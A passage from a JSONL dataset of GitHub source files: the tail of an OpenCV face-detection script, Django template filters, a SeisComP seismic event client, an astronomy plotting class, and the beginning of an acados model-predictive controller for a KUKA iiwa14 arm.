h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n # Save annotated image\n cv2.imwrite(out_dir + filename, img)\n if len(faces) > 0:\n return 1\n else:\n return 0\n except Exception as e:\n print(filename, e)\n unavailable_json.append(filename+out_dir)\n\n\ndef main():\n for file in in_files:\n with open(file, 'r') as f:\n filename = os.path.basename(file)[:-5] # only number\n try:\n dct = json.load(f)\n\n # Extract from photo\n # if dct['photo_url'] is not None:\n # if type(dct['photo_url']) is str: # single image\n # print(filename, 'has one image')\n # image_url = dct['photo_url']\n # face_present = detect_print(image_url, filename+'.png', image_out_dir)\n # elif type(dct['photo_url']) is list: # album / multiple image\n # face_present_list = []\n # print(filename, 'has multiple image')\n # for url in dct['photo_url']:\n # image_url = url\n # face_present = detect_print(image_url, filename+'-'+str(dct['photo_url'].index(url))+'.png', image_out_dir)\n # face_present_list.append(face_present)\n # new_dct = {'json_id': filename, 'face_present': face_present_list}\n # # print(new_dct)\n # list_of_dct.append(new_dct)\n\n # Extract from thumbnail\n # if dct['thumbnail_url'] is not None:\n # if type(dct['thumbnail_url']) is str:\n # image_url = dct['thumbnail_url']\n # face_present = detect_print(image_url, filename+'.png', tn_out_dir)\n # else:\n # print(filename, 'thumbnail is not str but [], pass')\n # new_dct = {'json_id': filename, 'face_present': face_present}\n # list_of_dct2.append(new_dct)\n\n except JSONDecodeError:\n unavailable_json.append(filename)\n\n cv2.destroyAllWindows()\n # df = pd.DataFrame(list_of_dct)\n # df.to_csv('json_face.csv', index=False)\n # df2 = pd.DataFrame(list_of_dct2)\n # df2.to_csv('json_tn_face.csv', index=False)\n\n print(unavailable_json)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","repo_name":"sklisa/master-modeler2021","sub_path":"FeaturePrep0314.py","file_name":"FeaturePrep0314.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44593989074","text":"#board index 정렬\nfrom django import template\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import linebreaksbr\n\nregister = template.Library()\n\n@register.filter\ndef sub(value, arg):\n return value - arg\n\n@register.filter\ndef custom_linebreaksbr(value, arg):\n new_value = \"\"\n count = 0\n for char in value:\n new_value += char\n count += 1\n if count % arg == 0:\n new_value += \"\\n\"\n return mark_safe(linebreaksbr(new_value))","repo_name":"KrswJo/aivle_ai_3rd_13th_big","sub_path":"board/templatetags/board_filter.py","file_name":"board_filter.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22658596581","text":"from __future__ import print_function\nimport sys\nfrom seiscomp.core import Time, TimeSpan\nfrom seiscomp.client import Application\nfrom seiscomp.datamodel import Event, Origin, Magnitude, PublicObject, FocalMechanism\nfrom seiscomp.communication import Protocol \nimport seiscomp.logging\n\ninfo = seiscomp.logging.info\ndebug = seiscomp.logging.info # XXX\nwarning = seiscomp.logging.warning\nerror = seiscomp.logging.error\n\n\n# Compound event with preferred origin/magnitude on board as well as some relevant state variables\nclass EventState:\n __slots__ = (\"event\", \"origin\", \"magnitude\", \"focalmechanism\", \"preferredOriginID\", \"preferredMagnitudeID\", \"preferredFocalMechanismID\")\n\n def __init__(self, evt=None):\n self.event = evt\n self.origin = None\n self.magnitude = None\n self.focalmechanism = None\n self.preferredOriginID = None\n self.preferredMagnitudeID = None\n self.preferredFocalMechanismID = None\n\n\nclass EventClient(Application):\n\n def __init__(self, argc, argv):\n Application.__init__(self, argc, argv)\n self.setMessagingEnabled(True)\n self.setDatabaseEnabled(True, True)\n self.addMessagingSubscription(\"EVENT\")\n self.addMessagingSubscription(\"LOCATION\")\n self.addMessagingSubscription(\"MAGNITUDE\")\n self.addMessagingSubscription(\"FOCMECH\")\n self.setAutoApplyNotifierEnabled(True)\n\n # object buffers\n self._state = {}\n self._origin = {}\n self._magnitude = {}\n self._focalmechanism = {}\n\n self._cleanupCounter = 0\n self._xdebug = False\n self._cleanup_interval = 3600.\n\n\n def cleanup(self):\n self._cleanupCounter += 1\n if self._cleanupCounter < 5:\n return\n debug(\"before cleanup:\")\n debug(\" _state %d\" % len(self._state))\n debug(\" _origin %d\" % len(self._origin))\n debug(\" _magnitude %d\" % len(self._magnitude))\n debug(\" _focalmechanism %d\" % len(self._focalmechanism))\n debug(\" public object count %d\" % (PublicObject.ObjectCount()))\n # we first remove those origins and magnitudes, which are\n # older than one hour and are not preferred anywhere.\n limit = Time.GMT() + TimeSpan(-self._cleanup_interval)\n\n originIDs = self._origin.keys()\n for oid in originIDs:\n if self._origin[oid].creationInfo().creationTime() < limit:\n del self._origin[oid]\n\n magnitudeIDs = self._magnitude.keys()\n for oid in magnitudeIDs:\n if self._magnitude[oid] is None:\n # This should actually never happen!\n error(\"Magnitude %s is None!\" % oid)\n del self._magnitude[oid]\n continue\n if self._magnitude[oid].creationInfo().creationTime() < limit:\n del self._magnitude[oid]\n\n focalmechanismIDs = self._focalmechanism.keys()\n for oid in focalmechanismIDs:\n if self._focalmechanism[oid].creationInfo().creationTime() < limit:\n del self._focalmechanism[oid]\n\n # finally remove all remaining objects older than two hours\n limit = Time.GMT() + TimeSpan(-2*self._cleanup_interval)\n to_delete = []\n for evid in self._state:\n org = self._state[evid].origin\n if org and org.time().value() > limit:\n continue # nothing to do with this event\n to_delete.append(evid)\n for evid in to_delete:\n del self._state[evid]\n\n debug(\"After cleanup:\")\n debug(\" _state %d\" % len(self._state))\n debug(\" _origin %d\" % len(self._origin))\n debug(\" _magnitude %d\" % len(self._magnitude))\n debug(\" _focalmechanism %d\" % len(self._focalmechanism))\n debug(\" public object count %d\" % (PublicObject.ObjectCount()))\n debug(\"-------------------------------\")\n self._cleanupCounter = 0\n\n\n def changed_origin(self, event_id, previous_id, current_id):\n # to be implemented in a derived class\n raise NotImplementedError\n\n\n def changed_magnitude(self, event_id, previous_id, current_id):\n # to be implemented in a derived class\n raise NotImplementedError\n\n\n def changed_focalmechanism(self, event_id, previous_id, current_id):\n # to be implemented in a derived class\n raise NotImplementedError\n\n\n def _get_origin(self, oid):\n if oid not in self._origin:\n self._load_origin(oid)\n if oid in self._origin:\n return self._origin[oid]\n\n\n def _get_magnitude(self, oid):\n if oid not in self._magnitude:\n self._load_magnitude(oid)\n if oid in self._magnitude:\n return self._magnitude[oid]\n\n\n def _get_focalmechanism(self, oid):\n if oid not in self._focalmechanism:\n self._load_focalmechanism(oid)\n if oid in self._focalmechanism:\n return self._focalmechanism[oid]\n\n\n def _load(self, oid, tp):\n assert oid is not None\n debug(\"trying to load %s %s\" % (str(tp), oid))\n tmp = tp.Cast(self.query().loadObject(tp.TypeInfo(), oid))\n if tmp:\n debug(\"loaded %s %s\" % (tmp.ClassName(), oid))\n return tmp\n\n\n def _load_event(self, oid):\n evt = self._load(oid, Event)\n self._state[oid] = EventState(evt)\n # if we do this here, then we override the preferred* here and are not able to detect the difference!\n self._state[oid].origin = self._get_origin(evt.preferredOriginID())\n self._state[oid].magnitude = self._get_magnitude(evt.preferredMagnitudeID())\n self._state[oid].focalmechanism = self._get_focalmechanism(evt.preferredFocalMechanismID())\n\n\n def _load_origin(self, oid):\n self._origin[oid] = self._load(oid, Origin)\n\n\n def _load_magnitude(self, oid):\n self._magnitude[oid] = self._load(oid, Magnitude)\n\n\n def _load_focalmechanism(self, oid):\n obj = self._load(oid, FocalMechanism)\n if obj:\n self._focalmechanism[oid] = obj\n warning(\"focalmechanism ID %s\" % obj.publicID())\n else:\n warning(\"focalmechanism is None\")\n\n\n def _process_event(self, evt):\n evid = evt.publicID()\n\n if self._xdebug:\n debug(\"_process_event %s start\" % evid)\n\n st = self._state[evid]\n previous_preferredOriginID = st.preferredOriginID\n previous_preferredMagnitudeID = st.preferredMagnitudeID\n previous_preferredFocalMechanismID = st.preferredFocalMechanismID\n\n # possibly updated preferredOriginID/preferredMagnitudeID\n preferredOriginID = evt.preferredOriginID()\n preferredMagnitudeID = evt.preferredMagnitudeID()\n preferredFocalMechanismID = evt.preferredFocalMechanismID()\n if not preferredOriginID:\n preferredOriginID = None\n if not preferredMagnitudeID:\n preferredMagnitudeID = None\n if not preferredFocalMechanismID:\n preferredFocalMechanismID = None\n\n info(\"%s preferredOriginID %s %s\" % (evid, previous_preferredOriginID, preferredOriginID))\n info(\"%s preferredMagnitudeID %s %s\" % (evid, previous_preferredMagnitudeID, preferredMagnitudeID))\n info(\"%s preferredFocalMechanismID %s %s\" % (evid, previous_preferredFocalMechanismID, preferredFocalMechanismID))\n\n\n # Test whether there have been any (for us!) relevant\n # changes in the event. We test for preferredOriginID,\n # preferredMagnitudeID and preferredFocalMechanismID\n if preferredOriginID is not None and preferredOriginID != previous_preferredOriginID:\n st.origin = self._get_origin(preferredOriginID)\n self.changed_origin(evid, previous_preferredOriginID, preferredOriginID)\n st.preferredOriginID = preferredOriginID\n\n if preferredMagnitudeID is not None and preferredMagnitudeID != previous_preferredMagnitudeID:\n st.magnitude = self._get_magnitude(preferredMagnitudeID)\n self.changed_magnitude(evid, previous_preferredMagnitudeID, preferredMagnitudeID)\n st.preferredMagnitudeID = preferredMagnitudeID\n\n if preferredFocalMechanismID is not None and preferredFocalMechanismID != previous_preferredFocalMechanismID:\n st.focalmechanism = self._get_focalmechanism(preferredFocalMechanismID)\n self.changed_focalmechanism(evid, previous_preferredFocalMechanismID, preferredFocalMechanismID)\n st.preferredFocalMechanismID = preferredFocalMechanismID\n\n self.cleanup()\n\n if self._xdebug:\n debug(\"_process_event %s end\" % evid)\n\n\n def _process_origin(self, obj):\n# self.cleanup()\n pass # currently nothing to do here\n\n\n def _process_magnitude(self, obj):\n# self.cleanup()\n pass # currently nothing to do here\n\n\n def _process_focalmechanism(self, obj):\n# self.cleanup()\n pass # currently nothing to do here\n\n\n def updateObject(self, parentID, updated):\n # called if an updated object is received\n for tp in [ Magnitude, Origin, Event, FocalMechanism ]:\n # try to convert to any of the above types\n obj = tp.Cast(updated)\n if obj:\n break\n\n if not obj:\n return\n\n oid = obj.publicID()\n\n if self._xdebug:\n debug(\"updateObject start %s oid=%s\" % (obj.ClassName(), oid))\n\n # our utility may have been offline during addObject, so we\n # need to check whether this is the first time that we see\n # this object. If that is the case, we load that object from\n # the database in order to be sure that we are working with\n # the complete object.\n if tp is Event:\n if oid in self._state:\n # *update* the existing instance - do *not* overwrite it!\n self._state[oid].event.assign(obj)\n else:\n self._load_event(oid)\n self._process_event(obj)\n\n elif tp is Origin:\n if oid in self._origin:\n # *update* the existing instance - do *not* overwrite it!\n self._origin[oid].assign(obj)\n else:\n self._load_origin(oid)\n self._process_origin(obj)\n\n elif tp is Magnitude:\n if oid in self._magnitude:\n # *update* the existing instance - do *not* overwrite it!\n self._magnitude[oid].assign(obj)\n else:\n self._load_magnitude(oid)\n self._process_magnitude(obj)\n\n elif tp is FocalMechanism:\n if oid in self._focalmechanism:\n # *update* the existing instance - do *not* overwrite it!\n self._focalmechanism[oid].assign(obj)\n else:\n self._load_focalmechanism(oid)\n self._process_focalmechanism(obj)\n\n if self._xdebug:\n debug(\"updateObject end\")\n\n\n def addObject(self, parentID, added):\n # called if a new object is received\n for tp in [ Magnitude, Origin, Event, FocalMechanism ]:\n obj = tp.Cast(added)\n if obj:\n break\n\n if not obj:\n return\n\n oid = obj.publicID()\n\n if self._xdebug:\n debug(\"addObject start %s oid=%s\" % (obj.ClassName(), oid))\n\n tmp = PublicObject.Find(oid)\n if not tmp:\n error(\"PublicObject.Find failed on %s %s\" % (tmp.ClassName(), oid))\n return\n # can we get rid of this?\n tmp = tp.Cast(tmp)\n tmp.assign(obj)\n obj = tmp\n\n if tp is Event:\n if oid not in self._state:\n self._state[oid] = EventState(obj)\n self._state[oid].origin = self._get_origin(obj.preferredOriginID())\n self._state[oid].magnitude = self._get_magnitude(obj.preferredMagnitudeID())\n else:\n error(\"event %s already in self._state\" % oid)\n self._process_event(obj)\n\n elif tp is Origin:\n if oid not in self._origin:\n self._origin[oid] = obj\n else:\n error(\"origin %s already in self._origin\" % oid)\n self._process_origin(obj)\n\n elif tp is Magnitude:\n if oid not in self._magnitude:\n self._magnitude[oid] = obj\n else:\n error(\"magnitude %s already in self._magnitude\" % oid)\n self._process_magnitude(obj)\n\n elif tp is FocalMechanism:\n if oid not in self._focalmechanism:\n self._focalmechanism[oid] = obj\n else:\n error(\"focalmechanism %s already in self._focalmechanism\" % oid)\n self._process_focalmechanism(obj)\n\n if self._xdebug:\n debug(\"addObject end\")\n\n\nclass EventWatch(EventClient):\n\n def __init__(self, argc, argv):\n EventClient.__init__(self, argc, argv)\n\n def _print(self, evid):\n s = self._state[evid]\n org = s.origin\n mag = s.magnitude\n foc = s.focalmechanism\n print(\"EVT %s\" % evid)\n if not org:\n return\n print(\"ORG %s\" % (org.time().value()))\n if not mag:\n return\n print(\"MAG %.2f %s\" % (mag.magnitude().value(), mag.type()))\n if not foc:\n return\n nmt = foc.momentTensorCount()\n print(\"FOC %d\" % (nmt))\n\n try:\n print(\" misfit: %.3f\" % (mt.misfit()))\n except:\n pass\n\n try:\n print(\" azigap: %.1f\" % (mt.azimuthalGap()))\n except:\n pass\n \n for i in range(foc.momentTensorCount()):\n mt = foc.momentTensor(i)\n try:\n print(\" clvd %.2f\" % (mt.clvd()))\n except:\n pass\n try:\n print(\" iso %.2f\" % (mt.iso()))\n except:\n pass\n# print(\" %s\" % (mt.momentMagnitudeID()))\n mw = Magnitude.Find(mt.momentMagnitudeID())\n mw = Magnitude.Cast(mw)\n if mw:\n print(\" MW %.2f %s\" % (mw.magnitude().value(), mw.type()))\n# print(\" dataUsedCount %d\" % mt.dataUsedCount())\n totalStationWeight = 0.\n totalComponentWeight = 0.\n for k in range(mt.momentTensorStationContributionCount()):\n sc = mt.momentTensorStationContribution(k)\n totalStationWeight += sc.weight()\n for j in range(sc.momentTensorComponentContributionCount()):\n cc = sc.momentTensorComponentContribution(j)\n totalComponentWeight += cc.weight()\n print(\" stationContribution %.2f\" % totalStationWeight)\n print(\" componentContribution %.2f\" % totalComponentWeight)\n\n # this could be the centroid location\n dorg = Origin.Find(mt.derivedOriginID())\n if dorg:\n print(\" time %s\" % (dorg.time().value()))\n print(\" lat %.2f\" % dorg.latitude().value())\n print(\" lon %.2f\" % dorg.longitude().value())\n print(\" dep %.1f\" % dorg.depth().value())\n else:\n print(\" no origin found for derivedOriginID() '%s'\" % mt.derivedOriginID())\n\n def changed_origin(self, event_id, previous_id, current_id):\n debug(\"EventWatch.changed_origin\")\n debug(\"event %s: CHANGED preferredOriginID\" % event_id)\n debug(\" from %s\" % previous_id)\n debug(\" to %s\" % current_id)\n self._print(event_id)\n\n def changed_magnitude(self, event_id, previous_id, current_id):\n debug(\"EventWatch.changed_magnitude\")\n debug(\"event %s: CHANGED preferredMagnitudeID\" % event_id)\n debug(\" from %s\" % previous_id)\n debug(\" to %s\" % current_id)\n self._print(event_id)\n\n def changed_focalmechanism(self, event_id, previous_id, current_id):\n debug(\"EventWatch.changed_focalmechanism\")\n debug(\"event %s: CHANGED preferredFocalMechanismID\" % event_id)\n debug(\" from %s\" % previous_id)\n debug(\" to %s\" % current_id)\n self._print(event_id)\n\nif __name__ == \"__main__\":\n app = EventWatch(len(sys.argv), sys.argv)\n sys.exit(app())\n\n","repo_name":"jsaul/sc3stuff","sub_path":"messaging/event-client/eventclient.py","file_name":"eventclient.py","file_ext":"py","file_size_in_byte":16484,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"24705162104","text":"#\r\nfrom apps.dcl.mdl.m_bmy import MBmy\r\nfrom apps.dcl.mdl.m_bm import MBm\r\n\r\nclass CWxs(object):\r\n def _init__(self):\r\n self.refl = ''\r\n\r\n @staticmethod\r\n def get_bmy_id_bm_vo_dict():\r\n '''\r\n 获取bmy_id(年款头输出)与车型值对象的字典\r\n '''\r\n bmy_id_bm_vo_dict = {}\r\n bmy_id_model_ids = MBmy.get_bmy_id_model_ids()\r\n for bimi in bmy_id_model_ids:\r\n bmy_id = int(bimi['bmy_id'])\r\n model_id = int(bimi['model_id'])\r\n model_vo = MBm.get_model_vo_by_id(model_id)\r\n bm_vo = {\r\n 'model_id': model_id,\r\n 'model_name': model_vo['model_name'],\r\n 'model_code': model_vo['model_code'],\r\n 'source_type': model_vo['source_type']\r\n }\r\n bmy_id_bm_vo_dict[bmy_id] = bm_vo\r\n return bmy_id_bm_vo_dict","repo_name":"yt7589/cvep","sub_path":"apps/dcl/controller/c_wxs.py","file_name":"c_wxs.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11703945664","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom typing import Union\r\n\r\nfrom autoarray.plot.wrap.two_d.abstract import AbstractMatWrap2D\r\nfrom autoarray.plot.wrap.base.units import Units\r\nfrom autoarray.inversion.pixelization.mappers.voronoi import MapperVoronoiNoInterp\r\nfrom autoarray.inversion.pixelization.mappers.voronoi import MapperVoronoi\r\nfrom autoarray.inversion.pixelization.mappers.delaunay import MapperDelaunay\r\n\r\nfrom autoarray.plot.wrap import base as wb\r\n\r\n\r\nclass InterpolatedReconstruction(AbstractMatWrap2D):\r\n \"\"\"\r\n Given a `Mapper` and a corresponding array of `pixel_values` (e.g. the reconstruction values of a Delaunay\r\n triangulation) plot the values using `plt.imshow()`.\r\n\r\n The `pixel_values` are an ndarray of values which correspond to the irregular pixels of the mesh (e.g. for\r\n a Delaunay triangulation they are the connecting corners of each triangle or Voronoi mesh). This cannot be plotted\r\n with `imshow()`, therefore this class first converts the `pixel_values` from this irregular grid to a uniform 2D\r\n array of square pixels via interpolation.\r\n\r\n The interpolation routine depends on the `Mapper`, with most mappers having their own built-in interpolation\r\n routine specific to that pixelization's mesh.\r\n\r\n This object wraps methods described in below:\r\n\r\n - plt.imshow: https://matplotlib.org/3.3.2/api/_as_gen/matplotlib.pyplot.imshow.html\r\n \"\"\"\r\n\r\n def imshow_reconstruction(\r\n self,\r\n mapper: Union[MapperDelaunay, MapperVoronoiNoInterp, MapperVoronoi],\r\n pixel_values: np.ndarray,\r\n units: Units,\r\n cmap: wb.Cmap,\r\n colorbar: wb.Colorbar,\r\n colorbar_tickparams: wb.ColorbarTickParams = None,\r\n aspect=None,\r\n ax=None,\r\n ):\r\n \"\"\"\r\n Given a `Mapper` and a corresponding array of `pixel_values` (e.g. the reconstruction values of a Delaunay\r\n triangulation) plot the values using `plt.imshow()`.\r\n\r\n The `pixel_values` are an ndarray of values which correspond to the irregular pixels of the mesh (e.g. for\r\n a Delaunay triangulation they are the connecting corners of each triangle or Voronoi mesh). This cannot be plotted\r\n with `imshow()`, therefore this class first converts the `pixel_values` from this irregular grid to a uniform 2D\r\n array of square pixels via interpolation.\r\n\r\n The interpolation routine depends on the `Mapper`, with most mappers having their own built-in interpolation\r\n routine specific to that pixelization's mesh.\r\n\r\n This object wraps methods described in below:\r\n\r\n - plt.imshow: https://matplotlib.org/3.3.2/api/_as_gen/matplotlib.pyplot.imshow.html\r\n\r\n Parameters\r\n ----------\r\n mapper\r\n An object which contains a 2D mesh (e.g. Voronoi mesh cells) and defines how to\r\n interpolate values from the pixelization's mesh.\r\n pixel_values\r\n The pixel values of the pixelization's mesh (e.g. a Voronoi mesh) which are interpolated to a uniform square\r\n array for plotting with `imshow()`.\r\n cmap\r\n The colormap used by `imshow()` to plot the pixelization's mesh values.\r\n colorbar\r\n The `Colorbar` object in `mat_base` used to set the colorbar of the figure the interpolated pixelization's mesh\r\n values (e.g. values interpolated from the Voronoi mesh) are plotted on.\r\n colorbar_tickparams\r\n Controls the tick parameters of the colorbar.\r\n \"\"\"\r\n\r\n if pixel_values is None:\r\n return\r\n\r\n vmin = cmap.vmin_from(array=pixel_values)\r\n vmax = cmap.vmax_from(array=pixel_values)\r\n\r\n color_values = np.where(pixel_values > vmax, vmax, pixel_values)\r\n color_values = np.where(pixel_values < vmin, vmin, color_values)\r\n\r\n cmap = plt.get_cmap(cmap.cmap)\r\n\r\n if colorbar is not None:\r\n colorbar = colorbar.set_with_color_values(\r\n units=units, cmap=cmap, color_values=color_values, ax=ax\r\n )\r\n if colorbar is not None and colorbar_tickparams is not None:\r\n colorbar_tickparams.set(cb=colorbar)\r\n\r\n interpolation_array = mapper.interpolated_array_from(values=pixel_values)\r\n\r\n plt.imshow(\r\n X=interpolation_array.native,\r\n cmap=cmap,\r\n extent=mapper.source_plane_mesh_grid.geometry.extent_square,\r\n aspect=aspect,\r\n )\r\n\r\n return interpolation_array\r\n","repo_name":"Jammy2211/PyAutoArray","sub_path":"autoarray/plot/wrap/two_d/interpolated_reconstruction.py","file_name":"interpolated_reconstruction.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"37781139217","text":"\nfrom typing import TYPE_CHECKING, Tuple\nfrom acados_template import AcadosOcp, AcadosOcpSolver, AcadosSimSolver\nimport numpy as np\nfrom tempfile import mkdtemp\nimport scipy\n# from optimal_planner import design_optimal_circular_trajectory\nfrom scipy.interpolate import interp1d\nimport sys\nimport os\nproject_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(project_root)\nfrom model.iiwa14_model import Symbolic_model\n\n\"\"\"\nwhen it is used for the calculation of circle trajectory\nQ_q = 1e7, Q_dq = 1e3, Q_qe = 1e7, Q_dqe = 1e3,\nself.nlp_solver_max_iter : int = 100\nself.P = np.diagflat(np.array([1]*3))* 3e7\nself.Pn = np.diagflat(np.array([1]*3))* 1e7\n\"\"\" \n\n\"\"\"\nwhen it is used for the calculation of single point\nQ_q = 0.1, Q_dq = 0.01, Q_qe = 5e2, Q_dqe = 5e1,\nself.nlp_solver_max_iter : int = 50\nself.P = np.diagflat(np.array([1]*3))* 3e3\nself.Pn = np.diagflat(np.array([1]*3))* 1e4\n\"\"\"\n\n\"\"\"\nwhen it is used for the expert data generation( DT ==0.05)\nQ_q = 0.1, Q_dq = 5e1, Q_qe = 5e2, Q_dqe = 5e1,\nself.nlp_solver_max_iter : int = 100\nself.P = np.diagflat(np.array([1]*3))* 3e3\nself.Pn = np.diagflat(np.array([1]*3))* 1e4\n\"\"\"\n\n# define penalty element of Q for state x \nQ_q = 0.1\nQ_dq = 0.01\n# define penalty element of Qn for terminal state x\nQ_qe = 5e2\nQ_dqe = 5e1\n\nclass MpcOptions:\n def __init__(self, tf: float=2, n: int=30) -> None:\n self.n : int = n\n self.tf : float = tf\n self.nlp_solver_max_iter : int = 50\n self.condensing_relative: float=1\n # define the wall constraint\n self.wall_0deg_constraint_on: bool = True\n self.wall_axis: int = 1\n self.wall_value: float = 0.4\n self.wall_pos_side: bool = False\n self.wall_30deg_constraint_on: bool = False\n # define the penalty matrices Q R and P\n self.Q = np.diagflat(np.array([[Q_q]*7 + [Q_dq]*7]))\n self.R = np.diagflat(np.array([0.001]*7))\n self.P = np.diagflat(np.array([1]*3))* 3e3\n self.Qn = np.diagflat(np.array([[Q_qe]*7 + [Q_dqe]*7]))\n self.Pn = np.diagflat(np.array([1]*3))* 1e4\n self.speed_slack: float = 1e6\n self.wall_slack: float = 1e4\n \n def get_sample_time(self) -> float:\n return self.tf/self.n\n \nclass MPC:\n def __init__(self, model: \"Symbolic_model\", \n x0: np.ndarray = None, pee_0: np.ndarray = None,\n options: MpcOptions = MpcOptions()) -> None:\n \n # x0, pee_0 column vector 2D array\n \n # this x0 and pee_0 are only used to initialize the controller,\n if x0 is None:\n x0 = np.zeros(model.nx,1)\n if pee_0 is None:\n pee_0 = np.zeros(3,1)\n \n # initialize the MPC conditions\n self.tau_max = model.tau_max\n self.dq_max = model.dq_max\n self.dymodel = model\n mpcmodel, constraint_expr = model.get_acados_model()\n self.model = mpcmodel\n self.options = options\n self.iteration_conuter = 0\n self.debug_time = []\n \n # initialize the parameter for circle trajectory\n self.inter_t2q = None\n self.inter_t2dq = None\n self.inter_pee = None\n \n # create ocp project to formulate the OCP optimal control problem\n ocp = AcadosOcp()\n ocp.model = mpcmodel\n ocp.dims.N = options.n\n ocp.code_export_directory = mkdtemp()\n \n # OCP parameters\n nx = self.dymodel.nx\n nu = self.dymodel.nu\n nz = self.dymodel.nz\n ny = nx + nu + nz\n ny_e = nx + nz\n self.nu = nu\n self.nx = nx\n \n # dimension check\n assert (nx == options.Q.shape[0] == options.Qn.shape[0])\n assert (nu == options.R.shape[0])\n assert (nz == options.P.shape[0] == options.Pn.shape[0])\n \n # set cost module\n ocp.cost.cost_type = 'LINEAR_LS'\n ocp.cost.cost_type_e = 'LINEAR_LS'\n \n ocp.cost.W = scipy.linalg.block_diag(options.Q, options.R, options.P)\n ocp.cost.W_e = scipy.linalg.block_diag(options.Qn, options.Pn)\n \n ocp.cost.Vx = np.zeros((ny, nx))\n ocp.cost.Vx[:nx, :] = np.eye(nx)\n \n ocp.cost.Vu = np.zeros((ny, nu))\n ocp.cost.Vu[nx:nx+nu, :] = np.eye(nu)\n \n ocp.cost.Vz = np.zeros((ny, nz))\n ocp.cost.Vz[nx+nu:, :] = np.eye(nz)\n \n ocp.cost.Vx_e = np.zeros((ny_e, nx))\n ocp.cost.Vx_e[:nx, :] = np.eye(nx)\n \n ocp.cost.Vz_e = np.zeros((ny_e, nz))\n ocp.cost.Vz_e[nx:, :] = np.eye(nz)\n \n goal_x = x0\n goal_cartesian = pee_0\n ocp.cost.yref = np.vstack((goal_x, np.zeros((nu,1)), goal_cartesian)).flatten()\n ocp.cost.yref_e = np.vstack((goal_x, goal_cartesian)).flatten()\n # the reference is only used to initialize the solver, there is a function to set the reference point\n \n # set constraints\n ocp.constraints.constr_type = 'BGH'\n ocp.constraints.x0 = x0.reshape((nx,))\n \n # define the bound for the control input u\n # idxbu: index of soft bounds on control inputs\n ocp.constraints.lbu = - self.tau_max\n ocp.constraints.ubu = self.tau_max\n ocp.constraints.idxbu = np.arange(nu)\n \n # define the bound for the state x(7,14)\n ocp.constraints.lbx = - self.dq_max\n ocp.constraints.ubx = self.dq_max\n ocp.constraints.idxbx = np.arange(7,14)\n \n ocp.constraints.lbx_e = - self.dq_max\n ocp.constraints.ubx_e = self.dq_max\n ocp.constraints.idxbx_e = np.arange(7,14)\n ocp.constraints.idxsbx = np.arange(7,14) \n \n # set constraints for the wall\n if options.wall_0deg_constraint_on:\n ocp.model.con_h_expr = constraint_expr[options.wall_axis]\n n_wall_constraints = 1\n ns = n_wall_constraints\n nsh = n_wall_constraints\n self.current_slacks = np.zeros((ns,))\n # define the penalty matrix for the slack variable\n ocp.cost.zl = np.array([1e3]*7+[1e4]*n_wall_constraints)\n ocp.cost.Zl = np.array([options.speed_slack]*7+[options.wall_slack]*n_wall_constraints)\n ocp.cost.zu = ocp.cost.zl\n ocp.cost.Zu = ocp.cost.Zl\n # define the bounds for the inequality constraints\n ocp.constraints.lh = np.ones((n_wall_constraints,))* (options.wall_value if options.wall_pos_side else -1e3)\n ocp.constraints.uh = np.ones((n_wall_constraints,))* (options.wall_value if not options.wall_pos_side else 1e3)\n # define the bounds on slacks corresponding to soft lower and upper bounds for nonlinear inequalities\n ocp.constraints.lsh = np.zeros(nsh)\n ocp.constraints.ush = np.zeros(nsh)\n # indices of soft nonlinear constraints within the indices of nonlinear constraints\n ocp.constraints.idxsh = np.array(range(n_wall_constraints))\n elif options.wall_30deg_constraint_on:\n ocp.model.con_h_expr = 0.577* constraint_expr[0]- constraint_expr[1] - 2.485\n n_wall_constraints = 1\n ns = n_wall_constraints\n nsh = n_wall_constraints\n self.current_slacks = np.zeros((ns,))\n # define the penalty matrix for the slack variable\n ocp.cost.zl = np.array([1e3]*7+[1e4]*n_wall_constraints)\n ocp.cost.Zl = np.array([options.speed_slack]*7+[options.wall_slack]*n_wall_constraints)\n ocp.cost.zu = ocp.cost.zl\n ocp.cost.Zu = ocp.cost.Zl\n # define the bounds for the inequality constraints\n ocp.constraints.lh = np.zeros((n_wall_constraints,))\n ocp.constraints.uh = np.ones((n_wall_constraints,))*1e3\n # define the bounds on slacks corresponding to soft lower and upper bounds for nonlinear inequalities\n ocp.constraints.lsh = np.zeros(nsh)\n ocp.constraints.ush = np.zeros(nsh)\n # indices of soft nonlinear constraints within the indices of nonlinear constraints\n ocp.constraints.idxsh = np.array(range(n_wall_constraints))\n \n else: \n ocp.cost.zl = np.array(([0]*7))\n ocp.cost.zu = np.array(([0]*7))\n ocp.cost.Zl = np.array([options.speed_slack]*7)\n ocp.cost.Zu = np.array([options.speed_slack]*7)\n \n # solver options\n ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM' # FULL_CONDENSING_QPOASES # PARTIAL_CONDENSING_HPIPM\n ocp.solver_options.qp_solver_cond_N = int(options.n * options.condensing_relative)\n ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'\n ocp.solver_options.integrator_type = 'IRK'\n ocp.solver_options.nlp_solver_type = 'SQP' # SQP_RTI, SQP\n ocp.solver_options.nlp_solver_max_iter = options.nlp_solver_max_iter\n\n ocp.solver_options.sim_method_num_stages = 2\n ocp.solver_options.sim_method_num_steps = 2\n ocp.solver_options.qp_solver_cond_N = options.n\n\n # set prediction horizon\n ocp.solver_options.tf = options.tf\n\n self.acados_ocp_solver = AcadosOcpSolver(ocp, json_file='acados_ocp_' + 'iiwa14' + '.json')\n # the reason for creating an OCP before creating the solver is to seperate the problem formulation from the numerical optimization process\n \n def reset(self) -> None:\n self.debug_time = []\n self.iteration_conuter = 0\n \n def set_reference_point(self, x_ref: np.ndarray, pee_ref: 